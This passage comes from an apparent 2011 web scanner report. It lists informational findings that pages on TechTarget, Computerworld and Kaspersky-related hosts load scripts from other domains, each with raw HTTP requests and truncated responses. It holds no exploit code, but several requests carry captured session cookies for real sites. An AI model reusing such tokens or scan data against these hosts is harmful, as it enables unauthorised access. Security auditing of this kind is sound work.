Connection: close
Content-Length: 59212

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js"></script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cdn.ttgtmedia.com/rms/ux/css/redesign_corrections.css" id="stylesheetCorrections" media="screen" />

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110901"></script>
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/5541/nodetag.js"></script>
...[SNIP]...

16.24. http://searchsecurity.techtarget.com/search/query previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/search/query

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js
http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110831
http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
http://content.dl-rms.com/rms/mother/5541/nodetag.js

Request

GET /search/query HTTP/1.1
Host: searchsecurity.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 14:12:12 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Content-Length: 46662

<!DOCTYPE html>
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
<meta name="pageStart" content="1315144932933" />

...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js"></script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cdn.ttgtmedia.com/rms/ux/css/searchsecurity_new.css" id="stylesheetSiteSpecific" media="screen" />

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110831"></script>
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/5541/nodetag.js"></script>
...[SNIP]...

16.25. http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js
http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830
http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
http://content.dl-rms.com/rms/mother/5541/nodetag.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:44 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; Domain=.techtarget.com; Path=/
Set-Cookie: referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; Domain=.techtarget.com; Path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Content-Length: 66197

<!DOCTYPE html>
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
<script>
var appCode=55;
</script>
<meta name="page
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js"></script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cdn.ttgtmedia.com/rms/ux/css/searchsecurity_new.css" id="stylesheetSiteSpecific" media="screen" />

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830"></script>
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/5541/nodetag.js"></script>
...[SNIP]...

16.26. http://solutioncenters.computerworld.com/riverbed_1Q11_cw/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutioncenters.computerworld.com
Path:	/riverbed_1Q11_cw/

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /riverbed_1Q11_cw/ HTTP/1.1
Host: solutioncenters.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.27. http://solutioncenters.computerworld.com/tm_security_journey_cloud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutioncenters.computerworld.com
Path:	/tm_security_journey_cloud/

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /tm_security_journey_cloud/ HTTP/1.1
Host: solutioncenters.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:20 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 01 Sep 2011 20:45:07 GMT
Accept-Ranges: bytes
Content-Length: 54272
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Solution Cente
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

16.28. http://solutioncenters.computerworld.com/virtual_computing_perspective/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutioncenters.computerworld.com
Path:	/virtual_computing_perspective/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://networkworld.com/includes/js/blogger.js
http://static.polldaddy.com/p/4978692.js
http://twitter.com/statuses/user_timeline/citrixar.json?callback=twitterCallback4&count=1
http://twitter.com/statuses/user_timeline/citrixpr.json?callback=twitterCallback5&count=1
http://twitter.com/statuses/user_timeline/netscaler.json?callback=twitterCallback3&count=1
http://twitter.com/statuses/user_timeline/xendesktop.json?callback=twitterCallback1&count=1
http://twitter.com/statuses/user_timeline/xenserver.json?callback=twitterCallback2&count=1

Request

GET /virtual_computing_perspective/ HTTP/1.1
Host: solutioncenters.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:17 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 15 Aug 2011 21:10:09 GMT
Accept-Ranges: bytes
Content-Length: 44986
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Home - Virtual
...[SNIP]...


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id="virtQuickPoll">
<script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4978692.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://networkworld.com/includes/js/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/xendesktop.json?callback=twitterCallback1&count=1"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/xenserver.json?callback=twitterCallback2&count=1"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/netscaler.json?callback=twitterCallback3&count=1"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/citrixar.json?callback=twitterCallback4&count=1"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/citrixpr.json?callback=twitterCallback5&count=1"></script>
...[SNIP]...

16.29. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

GET /store/kasperus/en_US/buy/productID.224975900/offerID.8575749809 HTTP/1.1
Host: store.digitalriver.com
Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df84d5

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101162326246,0)
Date: Sun, 04 Sep 2011 12:31:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app91
Content-Length: 173147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>

<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...

16.30. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224976400

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

GET /store/kasperus/en_US/buy/productID.224976400 HTTP/1.1
Host: store.digitalriver.com
Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; ORA_WX_SESSION="10.2.2.97:772-0#0"; JSESSIONID=DFC074834E717E721063668DDA488A72; VISITOR_ID=971D4E8DFAED4367B7156331573704A34236C16992AB1AF2; BIGipServerp-drh-dc2pod9-pool2-active=1627521546.772.0000; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=139817269288,0)
Date: Sun, 04 Sep 2011 12:35:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app91
Content-Length: 173147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>

<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...

16.31. http://support.kasperskyamericas.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET / HTTP/1.1
Host: support.kasperskyamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:24 GMT
Server: Apache
Vary: Cookie
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:02:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.32. http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/anti-virus-6-r2-mp4-windows-workstations

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/anti-virus-6-r2-mp4-windows-workstations HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; has_js=1; s_cc=true; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Contact%20Corporate%20Support; s_nr=1315144606318-New; s_sq=%5B%5BB%5D%5D; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.2.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:24 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:00:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 50184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.33. http://support.kasperskyamericas.com/corporate/contact-information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/contact-information

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/contact-information HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us/contact-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:56:03 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:56:02 GMT
ETag: "1e8a-4ac1df4724080"
Accept-Ranges: bytes
Content-Length: 31916
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.34. http://support.kasperskyamericas.com/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/index.html HTTP/1.1
Host: support.kasperskyamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:02:26 GMT
Server: Apache
Vary: Cookie
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:02:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.35. http://support.kasperskyamericas.com/corporate/live-chat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/live-chat

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/live-chat HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; has_js=1; s_cc=true; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Workstations%20%7C%20Anti-Virus%20for%20Windows%20Workstations%20R2%20MP4; s_SupportDivison=Corporate%20Support; s_nr=1315144674455-New; s_sq=%5B%5BB%5D%5D; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.4.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:49 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:20:57 GMT
ETag: "1ec7-4ac143ea27440"
Accept-Ranges: bytes
Content-Length: 31465
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.36. http://support.kasperskyamericas.com/corporate/mobile-security-7-enterprise-edition previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/mobile-security-7-enterprise-edition

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/mobile-security-7-enterprise-edition HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; s_SupportDivison=Corporate%20Support; has_js=1; s_cc=true; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.10.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Live%20Chat; s_nr=1315144715459-New; s_sq=kaspersky-usa%3D%2526pid%253DSupport%252520%25257C%252520Corporate%252520Support%252520%25257C%252520Live%252520Chat%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fsupport.kasperskyamericas.com%25252Fcorporate%25252Fmobile-security-7-enterprise-edition%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:01:38 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:20:57 GMT
ETag: "2316-4ac143ea27440"
Accept-Ranges: bytes
Content-Length: 43720
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.37. http://support.kasperskyamericas.com/corporate/open-support-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/open-support-case

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /corporate/open-support-case HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
